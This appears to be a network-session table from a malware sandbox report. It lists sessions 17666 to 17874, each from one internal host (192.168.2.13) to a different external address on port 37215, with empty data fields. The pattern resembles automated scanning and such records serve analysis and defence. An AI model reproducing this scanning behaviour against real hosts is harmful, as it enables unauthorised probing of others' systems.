                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17666192.168.2.1353300197.253.255.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17667192.168.2.1348614136.33.147.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17668192.168.2.1352552157.213.98.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17669192.168.2.135153041.41.137.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17670192.168.2.1342074157.241.29.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17671192.168.2.1334662170.183.1.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17672192.168.2.1339734197.160.74.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17673192.168.2.134371241.79.30.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17674192.168.2.133358641.65.145.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17675192.168.2.1356532197.147.122.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17676192.168.2.134952641.224.234.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17677192.168.2.134915041.234.132.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17678192.168.2.135794625.20.219.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17679192.168.2.1354698197.101.157.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17680192.168.2.1360056180.59.196.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17681192.168.2.1343352197.172.202.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17682192.168.2.1355640155.237.35.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17683192.168.2.135394841.205.198.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17684192.168.2.135561041.180.206.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17685192.168.2.1358430197.66.169.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17686192.168.2.1332962197.59.167.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17687192.168.2.135108641.235.195.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17688192.168.2.1342368197.197.234.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17689192.168.2.135090840.162.19.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17690192.168.2.1350446156.22.100.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17691192.168.2.1355642197.235.45.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17692192.168.2.1340120112.149.71.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17693192.168.2.1334402197.169.135.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17694192.168.2.1345662157.243.121.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17695192.168.2.1338144157.144.63.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17696192.168.2.1351356197.107.196.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17697192.168.2.135380241.241.232.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17698192.168.2.1351760157.159.206.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17699192.168.2.133401827.239.239.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17700192.168.2.134804241.223.252.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17701192.168.2.1341028157.73.59.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17702192.168.2.135931041.245.223.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17703192.168.2.1333964125.24.34.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17704192.168.2.135214042.88.168.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17705192.168.2.1337068197.129.54.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17706192.168.2.1352954197.95.100.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17707192.168.2.1358734197.204.32.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17708192.168.2.1334726197.48.58.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17709192.168.2.134264086.2.254.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17710192.168.2.1338170197.15.48.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17711192.168.2.1347732157.175.83.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17712192.168.2.135444617.64.161.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17713192.168.2.1346672197.63.233.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17714192.168.2.135582441.205.64.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17715192.168.2.135388641.102.103.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17716192.168.2.133929439.84.197.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17717192.168.2.1351216197.207.55.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17718192.168.2.1336378157.69.219.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17719192.168.2.1339542197.141.208.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17720192.168.2.1334304113.181.97.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17721192.168.2.1337920197.184.228.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17722192.168.2.134580441.13.4.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17723192.168.2.1349108157.118.246.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17724192.168.2.1332942197.248.55.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17725192.168.2.135498698.120.66.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17726192.168.2.135153259.49.20.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17727192.168.2.1351850197.159.234.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17728192.168.2.133774841.98.47.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17729192.168.2.133943441.247.60.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17730192.168.2.1355462157.115.183.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17731192.168.2.135236641.241.139.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17732192.168.2.1332902197.38.12.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17733192.168.2.1359452157.48.222.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17734192.168.2.1338784157.53.28.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17735192.168.2.135865278.49.25.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17736192.168.2.1351922157.107.119.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17737192.168.2.134203441.242.186.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17738192.168.2.1360050197.139.87.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17739192.168.2.133913841.159.6.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17740192.168.2.134895241.30.162.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17741192.168.2.1344900104.12.130.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17742192.168.2.135757238.152.136.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17743192.168.2.1357968157.82.186.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17744192.168.2.133849477.179.15.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17745192.168.2.1336854157.135.145.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17746192.168.2.1346692197.10.220.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17747192.168.2.1342326197.114.196.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17748192.168.2.133536649.93.178.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17749192.168.2.1352646157.67.95.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17750192.168.2.135518041.117.160.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17751192.168.2.1338054150.206.18.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17752192.168.2.1353946157.195.45.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17753192.168.2.1333616197.40.79.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17754192.168.2.1346306157.28.7.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17755192.168.2.1345344216.238.113.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17756192.168.2.1346436197.126.151.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17757192.168.2.1335752191.70.21.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17758192.168.2.1338926157.44.116.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17759192.168.2.136094841.0.243.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17760192.168.2.1347772157.242.190.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17761192.168.2.1360658157.53.18.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17762192.168.2.1343468157.102.105.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17763192.168.2.1352398197.41.29.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17764192.168.2.1344374197.31.252.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17765192.168.2.133559441.152.29.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17766192.168.2.1353928197.75.16.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17767192.168.2.134335857.78.248.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17768192.168.2.1354170157.44.91.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17769192.168.2.1353726119.75.89.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17770192.168.2.133452041.76.13.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17771192.168.2.1351106197.219.86.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17772192.168.2.1345298157.164.122.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17773192.168.2.1353648197.118.143.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17774192.168.2.1348718197.231.167.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17775192.168.2.1334184157.11.254.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17776192.168.2.1350076157.182.59.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17777192.168.2.1355136157.249.105.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17778192.168.2.134773241.144.66.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17779192.168.2.1357738157.60.67.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17780192.168.2.135629841.148.125.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17781192.168.2.1358556197.234.94.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17782192.168.2.1338308157.255.82.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17783192.168.2.1332904157.101.152.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17784192.168.2.1333560184.36.118.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17785192.168.2.1359406200.85.15.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17786192.168.2.133566041.224.106.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17787192.168.2.1351748197.222.115.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17788192.168.2.1342022157.195.114.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17789192.168.2.1347576157.129.195.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17790192.168.2.1334816157.163.51.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17791192.168.2.1344562157.147.111.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17792192.168.2.1345696166.205.98.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17793192.168.2.1341564157.62.36.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17794192.168.2.1351554110.233.69.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17795192.168.2.1334258197.49.244.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17796192.168.2.135800841.22.230.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17797192.168.2.135860641.90.223.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17798192.168.2.133711441.67.12.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17799192.168.2.1357872197.62.210.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17800192.168.2.135408814.245.34.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17801192.168.2.133551241.212.145.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17802192.168.2.1343402157.31.88.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17803192.168.2.1347848197.131.69.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17804192.168.2.134154284.161.151.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17805192.168.2.1343476197.90.113.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17806192.168.2.1333836148.149.106.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17807192.168.2.135847066.24.207.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17808192.168.2.1358290157.159.4.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17809192.168.2.133318041.155.102.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17810192.168.2.1357714208.73.40.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17811192.168.2.1334146197.126.134.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17812192.168.2.1348250157.93.171.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17813192.168.2.1332990157.201.43.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17814192.168.2.1359036116.202.43.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17815192.168.2.1341508157.58.169.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17816192.168.2.135366041.198.215.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17817192.168.2.1342320170.117.215.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17818192.168.2.135924841.89.222.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17819192.168.2.1356328157.249.220.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17820192.168.2.134439641.239.14.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17821192.168.2.1353876157.143.110.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17822192.168.2.1346832157.199.210.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17823192.168.2.1356688157.239.193.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17824192.168.2.133443441.233.168.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17825192.168.2.1341458157.231.45.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17826192.168.2.135485841.239.85.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17827192.168.2.135749492.165.35.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17828192.168.2.1336112197.208.113.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17829192.168.2.1336768197.180.203.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17830192.168.2.1343614197.101.121.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17831192.168.2.135514241.139.41.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17832192.168.2.135974020.247.80.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17833192.168.2.1338776157.241.153.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17834192.168.2.1337112157.204.5.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17835192.168.2.1359784197.21.196.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17836192.168.2.1350098197.181.51.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17837192.168.2.1341036157.244.251.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17838192.168.2.1334968193.134.19.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17839192.168.2.1333014197.60.157.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17840192.168.2.135165241.116.253.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17841192.168.2.135047241.42.10.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17842192.168.2.1348778197.208.160.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17843192.168.2.134680441.224.131.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17844192.168.2.134346441.169.80.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17845192.168.2.1358156155.101.182.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17846192.168.2.1354536197.40.130.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17847192.168.2.135248441.5.90.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17848192.168.2.1339982197.75.108.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17849192.168.2.135867841.142.139.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17850192.168.2.1333494193.156.134.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17851192.168.2.133277639.52.190.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17852192.168.2.1347700197.116.198.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17853192.168.2.1337484204.166.215.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17854192.168.2.1354562159.5.230.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17855192.168.2.1357562157.198.54.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17856192.168.2.1351934157.237.93.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17857192.168.2.1338272157.38.247.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17858192.168.2.1356148197.63.150.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17859192.168.2.1335002124.184.53.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17860192.168.2.1357864157.230.99.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17861192.168.2.133587041.21.56.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17862192.168.2.135454464.0.107.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17863192.168.2.1335808113.93.229.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17864192.168.2.135324081.76.190.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17865192.168.2.1335502188.194.247.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17866192.168.2.1343754157.115.44.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17867192.168.2.1359248157.133.24.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17868192.168.2.13355041.11.73.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17869192.168.2.1336066138.100.16.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17870192.168.2.1334556197.149.163.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17871192.168.2.1342400197.8.209.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17872192.168.2.135301041.227.0.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17873192.168.2.1351404157.56.199.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17874192.168.2.134804641.12.43.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
